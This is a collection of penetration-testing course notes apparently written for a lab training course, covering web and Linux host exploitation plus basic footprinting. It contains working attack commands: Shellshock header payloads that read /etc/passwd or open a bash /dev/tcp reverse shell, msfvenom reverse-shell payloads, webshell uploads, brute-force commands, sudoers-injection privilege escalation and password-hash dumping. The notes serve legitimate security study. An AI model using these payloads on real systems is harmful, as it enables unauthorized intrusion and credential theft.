connection to port 80 (HTTP) on the target — useful for manual HTTP requests. 50 | 51 | /robots.txt 52 | # As we know, the robots.txt file tells search engines what to crawl and what to avoid. 53 | 54 | wget http:///index.html 55 | # Downloads the index.html file from the target web server to your machine. 56 | ``` 57 | 58 |
59 | 60 | # Metasploit Modules 61 | 62 | ```shell 63 | use auxiliary/scanner/http/apache_userdir_enum 64 | # Enumerates Apache UserDir usernames (e.g., ~user) 65 | 66 | use auxiliary/scanner/http/brute_dirs 67 | # Brute-forces directories on the target web server 68 | 69 | use auxiliary/scanner/http/dir_listing 70 | # Checks for directory listing enabled at a specific path 71 | set PATH /data 72 | 73 | use auxiliary/scanner/http/dir_scanner 74 | # Scans for directories using a wordlist 75 | set DICTIONARY /usr/share/metasploit-framework/data/wordlists/directory.txt 76 | 77 | use auxiliary/scanner/http/files_dir 78 | # Attempts to identify accessible files in a given directory 79 | 80 | use auxiliary/scanner/http/http_header 81 | # Retrieves and displays HTTP headers from the server 82 | 83 | use auxiliary/scanner/http/http_login 84 | # Performs brute-force login attempts on HTTP basic auth 85 | 86 | use auxiliary/scanner/http/http_put 87 | # Attempts to upload a file using the HTTP PUT method 88 | set RHOSTS 89 | set FILENAME test.txt 90 | set FILEDATA "Hello world" 91 | 92 | use auxiliary/scanner/http/http_version 93 | # Detects the HTTP server version and banner 94 | 95 | use auxiliary/scanner/http/robots_txt 96 | # Reads and displays the contents of /robots.txt 97 | ``` 98 | 99 |
100 | 101 | # Brute force 102 | 103 | Brute-force HTTP Basic Authentication on a web server by trying multiple passwords 104 | 105 | ```shell 106 | curl -I http:/// 107 | # If you see this in the response headers, that's HTTP Basic Auth 108 | # HTTP/1.1 401 Unauthorized 109 | # WWW-Authenticate: Basic realm="something" 110 | 111 | # If it’s HTTP Basic Auth 112 | hydra -L -P http-get 113 | # Performs brute-force HTTP GET authentication using user and password lists. 114 | 115 | dirb http:// -a : 116 | # Brute-forces directories on the target web server using HTTP basic authentication. 117 | 118 | # If it’s Form-Based Login 119 | hydra -L -P http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username or password" 120 | # Command used to perform a brute-force attack against a web login form. 121 | ``` 122 | 123 |
124 | 125 | # Scanning with WMAP 126 | 127 | ```shell 128 | # Start Metasploit and load the WMAP extension that is used to perform web application assessments inside Metasploit. 129 | load wmap 130 | 131 | wmap_sites -a 132 | # This adds the target IP as a "site" for WMAP to analyze. 133 | 134 | wmap_targets -t http:// 135 | # This defines the protocol + IP or domain for the actual scan. 136 | 137 | wmap_sites -l 138 | # Lists added WMAP sites. 139 | 140 | wmap_targets -l 141 | # Lists configured WMAP targets. 142 | 143 | wmap_run -t 144 | # It does NOT test for vulnerabilities, just maps the site. 145 | # This scans the site for links, pages, and parameters — like a crawler. 146 | 147 | wmap_run -e 148 | # This performs actual vulnerability checks like XSS, SQLi, file upload issues, etc. 149 | 150 | /phpinfo.php 151 | # Accesses the phpinfo() page — reveals PHP version, configuration, server paths, and sometimes environment variables. 152 | # Useful for identifying LFI, RCE, and other PHP-based vulnerabilities. 153 | ``` 154 | 155 |
156 | 157 | # Tomcat JSP Upload Bypass 158 | 159 | ```shell 160 | use exploit/multi/http/tomcat_jsp_upload_bypass 161 | # Apache Tomcat v8.5.19 is vulnerable 162 | # Exploits Apache Tomcat servers by uploading a JSP shell via a bypass technique 163 | ``` 164 | 165 |
166 | 167 | # WebDAV - Microsoft IIS 168 | 169 | 1. Using DAVTest and Cadaver 170 | 171 | ```shell 172 | cadaver http:///webdav 173 | # Interactive WebDAV client for manual file upload/download. 174 | 175 | davtest -url http:///webdav 176 | # Tests enabled WebDAV methods and tries to upload test files. 177 | 178 | davtest -auth : -url http:///webdav 179 | # Same as above but with basic authentication. 180 | 181 | put /usr/share/webshells/asp/webshell.asp 182 | # Uploads a backdoor web shell using cadaver or other WebDAV tools. 183 | 184 | http:///webdav/webshell.asp 185 | # Access the uploaded web shell in the browser to run commands. 186 | 187 | ``` 188 | 189 | 2. Using Metasploit, Msfvenom and Cadaver 190 | 191 | ```shell 192 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f asp > backdoor.asp 193 | # Creates an ASP Meterpreter reverse shell payload. 194 | 195 | # Upload the payload to the target machine 196 | cadaver http:///webdav 197 | # Username and Password 198 | 199 | put /root/backdoor.asp 200 | # Uploads the generated backdoor to the WebDAV folder. 201 | 202 | use multi/handler 203 | # Launches the Metasploit listener to catch the reverse shell connection. 204 | set payload windows/meterpreter/reverse_tcp 205 | set LHOST 206 | set LPORT 1234 207 | ``` 208 | 209 | 3. Using Metasploit 210 | 211 | ```shell 212 | use exploit/windows/iis/iis_webdav_upload_asp 213 | # Exploits vulnerable IIS WebDAV servers by uploading an ASP web shell. 214 | set PATH /webdav/metasploit.asp # metasploit%RAND%.asp 215 | # %RAND% is a Metasploit variable that generates a random string when the exploit runs. It helps avoid overwriting and increases stealth. Fixed filenames can be useful for manual execution but might be detected more easily. 216 | ``` 217 | 218 |
219 | 220 | # Shellshock Exploit (Apache CGI) 221 | 222 | ```shell 223 | # Check the CGI script. 224 |
/.cgi 225 | # Access a CGI script directly in the browser or via curl. 226 | 227 | # Apache httpd 2.4.6 228 | # Example version known to be vulnerable to Shellshock. 229 | 230 | ls -al /usr/share/nmap/scripts | grep -e "shellshock" 231 | # Locate Nmap scripts related to Shellshock. 232 | 233 | nmap --script-help "*shellshock*" 234 | # Display help info for all Nmap Shellshock-related scripts. 235 | 236 | nmap -sV --script http-shellshock --script-args uri=/gettime.cgi,cmd=ls 237 | # Scans and attempts Shellshock using a target CGI script with a command. 238 | 239 | nmap -sV --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 240 | # Same as above — another format for defining the target URI. 241 | 242 | use exploit/multi/http/apache_mod_cgi_bash_env_exec 243 | # Metasploit module that exploits Shellshock via vulnerable Apache mod_cgi. 244 | set RHOSTS 245 | set TARGETURI 246 | set LHOST 247 | ``` 248 | 249 |
250 | 251 | # BadBlue 252 | 253 | ```shell 254 | # 80/tcp | open http | BadBlue httpd 2.7 255 | use exploit/windows/http/badblue_passthru 256 | # Exploits BadBlue HTTP server by executing system commands via a passthrough vulnerability. 257 | ``` 258 | 259 |
260 | 261 | # Rejetto 262 | 263 | ```shell 264 | # HttpFileServer httpd 2.3 265 | use exploit/windows/http/rejetto_hfs_exec 266 | ``` 267 | 268 |
269 | 270 | # Process Maker 271 | 272 | ```shell 273 | use exploit/multi/http/processmaker_exec 274 | set WORKSPACE workflow 275 | ``` 276 | 277 |
278 | 279 | # Xoda file upload 280 | 281 | ```shell 282 | use exploit/unix/webapp/xoda_file_upload 283 | # Exploits XODA by uploading a malicious PHP file via unrestricted file upload. 284 | # Allows remote code execution once the payload is accessed. 285 | set TARGETURI / 286 | set LHOST 287 | ``` 288 | 289 |
290 | 291 | # WordPress 292 | 293 | ```shell 294 | gobuster dir -u http:///plugins/ -w /usr/share/nmap/nselib/data/wp-plugins.lst 295 | # Scans for existing WordPress plugins by brute-forcing the /plugins/ directory using a known plugin wordlist. 296 | 297 | # e.g. 298 | gobuster dir -u http://target2.ine.local/wp-content/plugins/ -w /usr/share/nmap/nselib/data/wp-plugins.lst 299 | 300 | use auxiliary/scanner/http/wp_duplicator_file_read 301 | # Scans for and exploits an information disclosure vulnerability in the Duplicator plugin for WordPress. 302 | # Allows reading sensitive files (e.g., database configs) if backup files are exposed. 303 | set RHOSTS 304 | run 305 | 306 | # Now, the third flag is in the root directory. Let’s read it by setting the FILEPATH to /flag3.txt 307 | set FILEPATH /flag3.txt 308 | ``` 309 | 310 | 311 |
312 | 313 | # Targeting PHP 314 | 315 | **Metasploit** 316 | 317 | ```shell 318 | # Check the PHP version via web browser 319 | # PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection 320 | use exploit/multi/http/php_cgi_arg_injection 321 | # Exploits vulnerable PHP-CGI setups by injecting arguments into the PHP interpreter. 322 | # Leads to remote code execution if successful. 323 | ``` 324 | 325 | **Different approach** 326 | 327 | ```shell 328 | # Step 1: Download the exploit using SearchSploit 329 | searchsploit -m 18836.py # Copy exploit to current directory 330 | vim 18836.py # Open the script to review 331 | 332 | # Step 2: Run the original exploit to confirm code execution 333 | python2 18836.py 80 # You may see 'phpinfo' output, confirming RCE is possible 334 | 335 | # Step 3: Modify the exploit to include a reverse shell payload 336 | vim 18836.py 337 | # Replace the payload with a reverse shell (insert your Kali IP) 338 | # Try file descriptor 3 first 339 | pwn_code = """", 1234); exec("/bin/sh -i <&3 >&3 2>&3"); ?>""" 340 | :wq # Save and exit 341 | 342 | # Step 4: Start a Netcat listener in a new terminal 343 | nc -nvlp 1234 # Listen for the reverse shell on port 1234 344 | 345 | # Step 5: Run the exploit again to trigger the reverse shell 346 | python2 18836.py 80 347 | 348 | # Step 6: If no shell appears, change the file descriptor (e.g., to 4) 349 | vim 18836.py 350 | pwn_code = """", 1234); exec("/bin/sh -i <&4 >&4 2>&4"); ?>""" 351 | :wq # Save and exit 352 | 353 | # Restart the listener and run the exploit again 354 | nc -nvlp 1234 355 | python2 18836.py 80 356 | 357 | # Step 7: Once connected, upgrade the shell if needed 358 | /bin/bash -i # Get an interactive shell 359 | 360 | # Step 8: Verify you’re inside the web server environment 361 | pwd # Should be something like /var/www 362 | cat /etc/*release # Check Linux distribution 363 | 364 | # Note: This manual method helps understand the process deeply. 365 | # The same result could be achieved with Metasploit, but this offers better control. 366 | ``` 367 | 368 |
369 | 370 | # Exploitation MSF Modules 371 | 372 | ```shell 373 | exploit/multi/http/glassfish_deployer 374 | # Exploits GlassFish Server's admin deployment feature to upload a WAR file and achieve RCE. 375 | # Vulnerable versions: GlassFish Server 3.x and 4.x (with admin interface exposed). 376 | 377 | exploit/linux/http/vcms_upload 378 | # Exploits an unauthenticated file upload vulnerability in VCMS to get remote code execution. 379 | # Vulnerable version: VCMS 0.9.8 and possibly earlier. 380 | 381 | exploit/multi/http/werkzeug_debug_rce 382 | # Exploits exposed Werkzeug debugger in Flask apps to execute Python code remotely. 383 | # Vulnerable versions: Flask apps using Werkzeug debugger in debug mode (commonly before proper production hardening). 384 | ``` 385 | -------------------------------------------------------------------------------- /Course-Notes/06b. System & Host Based Attacks - Linux.md: -------------------------------------------------------------------------------- 1 | # System Host Based Attacks - Linux 2 | 3 |
4 | 5 | ## 1. Exploiting Linux Vulnerabilities 6 | 7 | ### 1.1. Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock) 8 | 9 | **Shellshock** is a critical security vulnerability discovered in 2014 that affects the GNU Bash shell on Unix-based systems. It allows attackers to execute arbitrary commands by manipulating how Bash handles environment variables. If exploited successfully, it can lead to remote code execution (RCE) and potentially full system compromise. 10 | - **Affected Versions**: GNU Bash versions 1.14 through 4.3 (prior to patches released in 2014). 11 | - **Impact**: Attackers can inject malicious commands into environment variables processed by Bash, potentially leading to unauthorized access or control over the system. 12 | 13 | ```shell 14 | nmap -Pn -A 15 | # Open the IP in the browser. We notice that there is a script whitin the site (CGI script) 16 | curl 17 | /gettime.cgi 18 | ``` 19 | 20 | A **CGI file** (Common Gateway Interface) is a script or program executed by a web server to generate dynamic content, such as processing form input, generating web pages, or handling requests. These scripts can be written in various programming languages, like Perl, Python, PHP, or Bash. 21 | 22 | ```shell 23 | ls -al /usr/share/nmap/scripts | grep -e "shellshock" 24 | nmap --script-help "*shellshock*" # Visit: https://nmap.org/nsedoc/scripts/http-shellshock.html 25 | 26 | # Check if the target is vulnerable by sending a malicious request to a specific URI. 27 | nmap -sV --script http-shellshock --script-args uri=/gettime.cgi,cmd=ls 28 | nmap -sV --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 29 | ``` 30 | 31 | **Exploit with Metasploit** 32 | 33 | ```shell 34 | # Start Metasploit 35 | search shellshock 36 | use exploit/multi/http/apache_mod_cgi_bash_env_exec 37 | set RHOSTS 38 | set LHOST 39 | set TARGETURI # e.g. http://demo.ine.local/gettime.cgi 40 | exploit 41 | ``` 42 | 43 | **Exploit with Burp** 44 | 45 | ```shell 46 | # Activate the proxy using the extension in Firefox. 47 | # Open BurpSuite > Proxy > Intercept is on. 48 | # We are going to inject the special characters in User-Agent header. 49 | # Send to the repeater. 50 | User-Agent: () { :; } ; echo; echo; /bin/bash -c 'cat /etc/passwd' 51 | # Click send. 52 | # We can utilize bash to essencially connect to a listener on our Kali Linux. We can do this using netcat. 53 | nc -nvlp 54 | User-Agent: () { :; } ; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp// 0>&1' 55 | # We should get a reversal on our netcat listener. 56 | whoami 57 | cat /etc/*issue 58 | ``` 59 | 60 | ### 1.2. Exploiting FTP 61 | 62 | **FTP** (File Transfer Protocol) is a protocol that uses TCP port 21 and is used to facilitate file sharing between a server and client/clients. 63 | 64 | **Objective** - Answer the following questions: 65 | 1) What is the version of FTP server? 66 | 2) Use the username dictionary 67 | - /usr/share/metasploit-framework/data/wordlists/common_users.txt 68 | - /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 69 | - List all found credentials. 70 | 3) Find the password of user “sysadmin” using nmap script. 71 | 4) Find seven flags hidden on the server. 72 | 73 | ```shell 74 | ping -c 1 75 | nmap -sV 76 | # 1) 21/tcp open ftp ProFTPD 1.3.5a 77 | 78 | # We can also check this using nmap scripts. 79 | ls -al /usr/share/nmap/scripts/ | grep ftp-* 80 | nmap -p 21 --script 81 | 82 | # 2) Hydra command for performing a brute-force attack on the FTP service. 83 | # -t4, this sets the number of parallel connections (threads) to 4. 84 | hydra 85 | -L /usr/share/metasploit-framework/data/wordlists/common_users.txt 86 | -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 87 | ftp:// -t 4 88 | 89 | # 3) Find the password of user “sysadmin” using nmap script. 90 | nmap --script ftp-brute --script-args userdb=/root/users -p 21 91 | 92 | # 4) Establish a connection to the FTP service 93 | ftp 94 | 95 | 96 | # When executed, this command attempts to establish a connection to the FTP service running on the target machine. If successful, you'll be prompted to enter a username and password for authentication. Use the credentials found with Hydra. 97 | dir 98 | get secret.txt 99 | exit 100 | cat secret.txt 101 | ``` 102 | 103 | ### 1.3. Exploiting SSH 104 | 105 | **SSH (Secure Shell)** is a network protocol that allows secure access to remote systems over an unsecured network. It provides encrypted communication between a client and a server, typically used for remote administration, file transfers, and tunneling. 106 | 107 | **Objective**: Your task is to run the following auxiliary modules against the target: 108 | - auxiliary/scanner/ssh/ssh_version 109 | - auxiliary/scanner/ssh/ssh_login 110 | 111 | The following username and **password dictionary** will be useful: 112 | - /usr/share/metasploit-framework/data/wordlists/common_users.txt 113 | - /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 114 | 115 | ```shell 116 | # Using Metasploit 117 | msfconsole -q 118 | use auxiliary/scanner/ssh/ssh_version 119 | set RHOSTS 120 | exploit 121 | 122 | # Bruteforce with metasploit 123 | use auxiliary/scanner/ssh/ssh_login 124 | set RHOSTS demo.ine.local 125 | set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt 126 | set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt 127 | set STOP_ON_SUCCESS true 128 | exploit 129 | 130 | sessions 131 | sessions -i 1 132 | find / -name "flag" 133 | cat /flag 134 | 135 | # Bruteforce with Hydra 136 | hydra 137 | -L /usr/share/metasploit-framework/data/wordlists/common_users.txt 138 | -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 139 | -t 4 ssh 140 | 141 | # Acess SSH 142 | ssh @ 143 | ls / 144 | find / -type f -name "*flag*" 2>/dev/null 145 | cat /flag 146 | ``` 147 | 148 | ### 1.4. Exploiting SAMBA 149 | 150 | **SMB (Server Message Block)** is a network file sharing protocol that allows applications and users to read and write to files and request services from server programs in a computer network. In this lab we will look at the dictionary attack on SMB server. 151 | 152 | **Objective**: Answer the following questions: 153 | 154 | 1. What is the password of user “jane” required to access share “jane”? 155 | 156 | *Use smb_login metasploit module with password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt* 157 | 158 | ```shell 159 | use scanner/smb/smb_login 160 | set RHOSTS 161 | set SMBuser jane 162 | set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt 163 | ``` 164 | 165 | 2. What is the password of user “admin” required to access share “admin”? 166 | 167 | *Use hydra with password wordlist: /usr/share/wordlists/rockyou.txt* 168 | 169 | ```shell 170 | # The command gzip -d /usr/share/wordlists/rockyou.txt.gz decompresses the rockyou.txt.gz file, extracting the plain text password list from its compressed .gz format for use in password attacks or brute-force tools. 171 | gzip -d /usr/share/wordlists/rockyou.txt.gz 172 | 173 | # Use Hydra 174 | hydra 175 | -l admin 176 | -P /usr/share/wordlists/rockyou.txt.gz 177 | 178 | smb 179 | ``` 180 | 181 | 3. Which share is read only? Use smbmap with credentials obtained in question 2. 182 | 183 | ```shell 184 | smbmap 185 | smbmap -u -p -H 186 | ``` 187 | 188 | 4. Is share “jane” browseable? Use credentials obtained from the 1st question. 189 | 190 | ```shell 191 | smbclient -L -U jane 192 | # Share "jane" is not listed. Checking whether jane share exists: 193 | smbclient ///jane -U jane 194 | # Share “Jane” exists but is not browsable. 195 | ``` 196 | 197 | 5. Fetch the flag from share “admin” 198 | 199 | ```shell 200 | smbclient ///admin -U admin 201 | ls 202 | cd hidden 203 | ls 204 | get flag.tar.gz 205 | exit 206 | tar -xf flag.tar.gz 207 | cat flag 208 | ``` 209 | 210 | 6. List the named pipes available over SMB on the samba server? Use pipe_auditor metasploit module with credentials obtained from question 2. 211 | 212 | ```shell 213 | use auxiliary/scanner/smb/pipe_auditor 214 | set RHOSTS 215 | set SMBUser 216 | set SMBPass 217 | exploit 218 | ``` 219 | 220 | 7. List SID of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2. 221 | 222 | ```shell 223 | enum4linux -r -u "" -p "" 224 | ``` 225 | 226 |
227 | 228 | ## 2. Linux Privilege Escalation 229 | 230 | ### 2.1. Exploiting Misconfigured Cron Jobs 231 | 232 | **Cron** is a lifesaver for admins when it comes to doing periodic maintenance tasks on the system. They can even be used in cases where tasks are performed within individual user directories. However, such automations need to be used with caution or can lead to easy privilege escalation attacks. 233 | 234 | **Objective**: Your mission is to get a root shell on the box and retrieve the flag! 235 | 236 | ```shell 237 | ping -c 1 238 | #Open a browser and navigate to the following URL to explore the service running on port 8000: 239 | http://target.ine.local:8000 240 | # You should now see the Linux terminal interface running, confirming that the service is live and accessible. 241 | 242 | # There is a message file in the home directory of student user. Only root user has permissions on this file. So, student user can’t even read it. 243 | ls -l 244 | # Find if a file with the same name exists on the system. 245 | find / -name message 246 | # Observe that a file with the same name is present in the /tmp directory. On checking closely, it is clear that this file is being overwritten every minute. 247 | ls -l /tmp/ 248 | ``` 249 | 250 | This means there is some script/binary which is copying this file from the student home directory to /tmp directory. Search for that script. If this script is doing a simple copy operation, it must have the source destination of the file in it. Try to locate that by using the grep command. On trying on different directories one by one (i.e. /, etc, /opt) and on /usr directory, a match has been found. 251 | 252 | ```shell 253 | grep -nri "/tmp/message" /usr 254 | # `grep`: A command-line tool used to search for specific patterns in files. 255 | # `-n`: Displays the line number in the file where the matching text is found. 256 | # `-r`: Performs a recursive search, meaning it will search through all subdirectories under `/usr`. 257 | # `-i`: Makes the search case-insensitive so it will match `/tmp/message`, `/TMP/MESSAGE`, `/Tmp/Message`, etc. 258 | # `"/tmp/message"`: The search pattern, It looks for any instance of this exact text string. 259 | # `/usr`: The starting directory for the search. The command will look through all files and subfolders within `/usr`. 260 | 261 | # Check the permissions on this script file and its contents. 262 | ls -l /usr/local/share/copy.sh 263 | cat /usr/local/share/copy.sh 264 | ``` 265 | 266 | As the script file is writable by the current student user, it can be modified to execute our commands. This script is executed by root cron job, so it can do privileged operations. But, the file can’t be modified directly as there is no text editor on the system. 267 | 268 | ```shell 269 | vim /usr/local/share/copy.sh 270 | vi /usr/local/share/copy.sh 271 | nano /usr/local/share/copy.sh 272 | # command not found 273 | 274 | # Use printf to replace the original code with the following lines. 275 | printf '#! /bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh 276 | 277 | # On execution, these lines will add a new entry to the /etc/sudoers file which will allow the student user to use sudo without providing any password. 278 | 279 | cat /usr/local/share/copy.sh 280 | 281 | # Check the current sudoers list. 282 | sudo -l 283 | 284 | # Switch to the root user using sudo. 285 | sudo su 286 | 287 | # Collect the flag from the root directory. 288 | cd /root 289 | ls -l 290 | cat flag 291 | ``` 292 | 293 | ### 2.2. Exploiting SUID Binaries 294 | 295 | Vulnerable setuid on Linux systems could lead to privilege escalation attacks. In this lab, we will look at how to exploit them. On the target machine, you are provided a regular user account and need to escalate your privileges to become root. There are 2 programs in the home directory welcome and greetings which might be vulnerable. 296 | 297 | **Objective:** 298 | - Get a root shell on the system 299 | - View /etc/shadow 300 | - Retrieve the flag. 301 | 302 | ```shell 303 | ping -c 1 304 | # Open firefox, and access the target machine's terminal at http://target.ine.local:8000 305 | # Check the contents of the student's directory. 306 | pwd 307 | ls -l 308 | # We see two binaries there, greeting and welcome. We can also notice the 's' which stants from SUID permission. 309 | # -rwsr-xr-x 1 root root 8344 Sep 22 2018 welcome 310 | ``` 311 | 312 | Observe that the welcome binary has suid bit set (or on). This means that this binary and its child processes will run with root privileges. Check the file type. 313 | 314 | ```shell 315 | file welcome 316 | ./greetings # We don't have the permission for this binary 317 | # But we have for 318 | ./welcome 319 | ``` 320 | 321 | Investigate the binary. The most easy or preliminary way of doing that is to use strings command. 322 | 323 | ```shell 324 | strings welcome 325 | # We can see 'greetings' that it calls upon the greeting binery which is very interesting 326 | ``` 327 | 328 | Observe the greetings strings in the output of the strings command. It is possible that welcome binary is calling greetings binary. So, replace the greetings binary with some other binary (say /bin/bash) which should then also get executed as root. 329 | 330 | ```shell 331 | # Delete greetings binary and then copy /bin/bash to its location and rename that to greetings. 332 | rm greetings 333 | cp /bin/bash greetings 334 | ls 335 | 336 | # Then, run the welcome binary again. 337 | ./welcome # Execute the bash with root privileges 338 | id 339 | whoami 340 | ``` 341 | 342 | Student user got escalate to root user. Retrieve the flag kept in /root directory. 343 | 344 | ```shell 345 | ls 346 | cat flag 347 | ``` 348 | 349 |
350 | 351 | ## 3. Linux Credential Dumping 352 | 353 | ### 3.1. Password Cracker: Linux 354 | 355 | All account information for users on a Linux system is stored in the `/etc/passwd` file. While this file contains user details, it does not display actual passwords since they are encrypted. Additionally, the `passwd` file is readable by any user on the system, meaning it does not store sensitive password data directly, but only the root user can modify it. 356 | 357 | Passwords are stored in /etc/shadow, which is readable only by root. 358 | 359 | - `/etc/shadow` → This file contains hashed passwords for all local users. 360 | - `/etc/passwd` → Holds basic user info, but not the actual password hashes. 361 | 362 | **Objective**: Run the following auxiliary module against the target: 363 | - auxiliary/analyze/crack_linux 364 | 365 | **Gain access to the system** 366 | 367 | ```shell 368 | ping -c 1 369 | nmap -sV 370 | 371 | searchsploit ProFTPD # Now check for the version detected by nmap 372 | # We have discovered a proftpd 1.3.3c server running on the target machine. We will run nmap vuln script to identify the vulnerability. 373 | nmap --script vuln -p 21 374 | 375 | service postgresql start && msfconsole # /etc/init.d/postgresql start 376 | search proftpd 377 | use exploit/unix/ftp/proftpd_133c_backdoor 378 | set payload /cmd/unix/reverse # To be set first before the LHOST 379 | set RHOSTS 380 | set LHOST 381 | exploit -z 382 | # -z flag is used with the exploit command to run an exploit without interacting with a new session after execution 383 | ``` 384 | 385 | **Use the post exploitation module to dump the system users hashes** 386 | 387 | ```shell 388 | search hashdump 389 | use post/linux/gather/hashdump 390 | set SESSION 1 391 | exploit 392 | loot 393 | ``` 394 | 395 | **Run the provided auxiliary module to find the plain text password of the root user.** 396 | 397 | ```shell 398 | search crack linux 399 | use auxiliary/analyze/crack_linux 400 | set SHA512 true 401 | run 402 | ``` 403 | 404 | **Using John** 405 | 406 | ```shell 407 | john --format=sha512crypt --wordlist= 408 | ``` 409 | 410 | The module does **not go out and find hashes by itself**. It depends on the fact that: 411 | 1. You (or a post-exploitation module) have already **dumped the hashes** (e.g., from `/etc/shadow`) 412 | 2. Metasploit **stored those hashes** in its internal database (via `loot`, `creds`, or `post modules`) 413 | 3. `analyze/crack_linux` reads those stored hashes and cracks them 414 | 415 | **Example: ** 416 | 417 | root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:18348:0:99999:7::: 418 | 419 | Username 420 | - `root` 421 | 422 | Password hash 423 | - `$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.` 424 | 425 | Hashing algorithm: **SHA-512** 426 | - `$6$` 427 | 428 | Salt used in the hash 429 | - `sgewtGbw` 430 | 431 | Actual hashed password 432 | - `ihhoUYSuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.` 433 | 434 | Last password change (days since Jan 1, 1970) 435 | - `18348` 436 | 437 | Minimum number of days before the password can be changed 438 | - `0` 439 | 440 | Maximum number of days the password is valid 441 | - `99999` 442 | 443 | Number of days before expiration to warn the user 444 | - `7` 445 | 446 | Reserved for inactivity period, account expiration, and flags 447 | - `:::` 448 | **** 449 | -------------------------------------------------------------------------------- /Course-Notes/02. Footprinting and Scanning.md: -------------------------------------------------------------------------------- 1 | # Footprinting and Scanning 2 | 3 |
4 | 5 | ## 1. Introduction 6 | 7 | This process involves identifying hosts, scanning for open ports, and discerning services and operating systems - **a pivotal skill for the subsequent exploitation phase**. To master these techniques, a foundational understanding of networks and protocols is imperative. 8 | 9 | ### 1.1. Open Systems Interconnection (OSI) Model 10 | 11 | The [OSI](https://en.wikipedia.org/wiki/OSI_model) model is a conceptual framework used to understand and standardize the functions of a networking or telecommunication system. It divides the process of communication into seven distinct layers, each responsible for a specific aspect of data transmission. 12 | 13 | ### 1.2. TCP/UDP ports 14 | 15 | - **UDP (User Datagram Protocol)** ports facilitate connectionless communication, meaning data is sent without establishing a connection or guaranteeing delivery. This makes UDP faster but less reliable, often used for applications like streaming or gaming where speed is prioritized over accuracy. 16 | - **TCP (Transmission Control Protocol)** ports enable connection-oriented communication, ensuring reliable data transfer through error-checking and acknowledgment processes. TCP is slower but more reliable, commonly used for applications like web browsing or email where accurate data transmission is crucial. 17 | - **List of TCP/UDP ports** - [IANA link](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml). 18 | 19 | ### 1.3. Stateful and Stateless Firewalls 20 | 21 | - **Stateful** systems maintain information about the state of an interaction, allowing them to track ongoing connections or sessions. For example, a stateful firewall keeps track of active connections and allows or blocks traffic based on the context of the connection. 22 | - **Stateless** systems do not retain information about previous interactions, treating each request as an independent transaction. A stateless firewall, for instance, makes decisions based solely on individual packets without regard to the connection's history. 23 | 24 | ### 1.4. Regex 25 | 26 | [Regex](https://regex101.com/) (short for **Regular Expression**) is a sequence of characters that defines a search pattern, typically used for string searching, matching, and manipulation tasks. Regex is a powerful tool for finding, extracting, or replacing text based on specific patterns, and it's widely used in programming, text processing, and data validation. 27 | 28 |
29 | 30 | ## 2. TCP/IP utilities and Network Commands 31 | 32 | **These TCP/IP utilities and network commands** are essential for managing network configurations, monitoring network activity, and troubleshooting network issues on Linux systems. They interact with various layers of the network stack, from hardware interfaces to high-level protocols, providing a comprehensive set of tools for network administration. 33 | 34 | ### 2.1. IP command 35 | 36 | The **`ip`** command is essential for managing networking tasks at both the Data Link (Layer 2) and Network Layers (Layer 3) of the OSI model. It offers a comprehensive set of tools for configuring interfaces, managing IP addresses, setting routes, and more. 37 | 38 | ```shell 39 | ip addr show 40 | # This command displays all IP addresses assigned to network interfaces. 41 | 42 | ip addr add / dev 43 | # This command adds an IP address to a specific network interface. Replace with the desired IP address, with the subnet prefix (e.g., /24 for 255.255.255.0), and with the name of the network interface (e.g. eth0). 44 | 45 | ip addr del / dev 46 | # This command removes an IP address from a network interface. Replace , , and with the appropriate values. 47 | 48 | ip route show 49 | # This command displays the current routing table, showing how traffic is routed on the system. 50 | 51 | ip route add default via 52 | # This command adds a default route (gateway) for outbound traffic. Replace with the IP address of the gateway/router. 53 | 54 | ip route get 55 | # This command shows you the specific route that your system will take to reach a given IP address, including the interface it will use. 56 | 57 | ip route del default 58 | # This command removes the default route from the routing table. 59 | 60 | ip neighbor show 61 | # This command displays the ARP (Address Resolution Protocol) cache, which maps IP addresses to MAC addresses. 62 | 63 | ip link set promisc 64 | # Set your network interface into promiscuous mode. 65 | ``` 66 | 67 | ### 2.2. Ping Command 68 | 69 | The ping command is a network tool used to check if a host is reachable on an IP network. It sends ICMP Echo Request packets to a target and waits for a response, measuring the time it takes for the round trip. 70 | 71 | ```shell 72 | ping 73 | # This command sends ICMP Echo Request packets to the specified (which can be an IP address or a domain name) to test connectivity and measure response times. 74 | 75 | ping -c 76 | # This command sends a specific number of ICMP Echo Request packets to the and then stops. Replace with the number of pings you want to send and with the target host. 77 | 78 | ping -i 79 | # This command sets the interval between sending each packet to seconds. Replace with the desired number of seconds and with the target host. 80 | 81 | ping -t 82 | # This command sets the Time To Live (TTL) for the packets sent to . TTL limits the number of hops a packet can take before being discarded. Replace with the desired TTL value and with the target host. 83 | 84 | ping -W 85 | # This command sets the timeout period to wait for a reply from the . Replace with the number of seconds to wait and with the target host. 86 | 87 | ping -v 88 | # This command enables verbose output, providing more detailed information about each ICMP request and reply. Replace with the target host. 89 | 90 | ping -R 91 | # This command records the route of the packets sent to the , but this is specific to IPv4. Replace with the target. 92 | 93 | ping -n 94 | # This command 